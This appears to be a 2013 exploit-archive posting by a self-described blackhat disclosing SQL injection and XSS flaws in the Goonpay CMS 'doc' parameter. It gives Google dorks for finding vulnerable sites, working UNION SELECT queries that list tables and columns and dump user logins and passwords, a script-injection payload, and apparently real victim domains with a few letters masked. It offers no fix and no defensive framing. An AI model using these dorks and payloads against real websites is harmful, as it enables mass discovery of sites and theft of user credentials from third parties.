Goonpay CMS Multiple Vulnerability

2013.10.13

Credit: Arsan

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:\"/?doc=\" , intext:\"Conception graphique : goonpay.com\"

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: Goonpay CMS Multiple Vulnerability
# Date: 2013 12 October
# Author: Arsan
# Vendor Homepage: http://www.goonpay.com
# Version : All Version
# Security Risk: High
# Tested on: Backtrack
# Category: webapps
# Google Dork: inurl:"/?doc=" , intext:"Conception graphique : goonpay.com"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# [-] Description :
# SQL Injection And XSS In (index.php) Parameter "doc" :
# http://<server>/?doc=[SQL-Injection][XSS]
# [-] Description Exploit :
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[SQL Injection]
# (+) Tables Name:
# (+) Query :
# +union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--
# _recettes
# departements
# doctypes
# documents
# galeries
# notesRecettes
# sharedRecettes
# timesConvertor
# users
# usersaccreditations
# userslvl
# ----------
# (+) User Table (users) Columns :
# (+) Query :
# +union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x7573657273
# id
# login
# pass
# nom
# mail
# dept
# userlvl
# adresse
# tel
# prenom
# date_naissance
# lieu_naissance
# cp
# ville
# nom_entreprise
# lieu_entreprise
# domaine_competence_entreprise
# fonction_entreprise
# tel_pro
# hobbies
# photo
# ----------
# (+) User And Password In : login,0x3a,pass
# (+) Query :
# +union+select+1,2,group_concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[XSS]
# Just Insert This Code After Url :
# "><script>alert(/Arsan/)</script>
# Example :
# http://dietiXoandco.fr/?doc="><script>alert(/Arsan/)</script>
# http://redXden.com/?doc="><script>alert(/Arsan/)</script>
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Demo :
#
# http://dietisXoandco.fr/?doc=[SQL-Injection][XSS]
# http://redraXen.com/?doc=[SQL-Injection][XSS]
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
# Arsan.Blackhat@gmail.com
# Twitter.com/ArsanBlackhat
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Goonpay CMS Multiple Vulnerability

Dork: inurl:\"/?doc=\" , intext:\"Conception graphique : goonpay.com\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.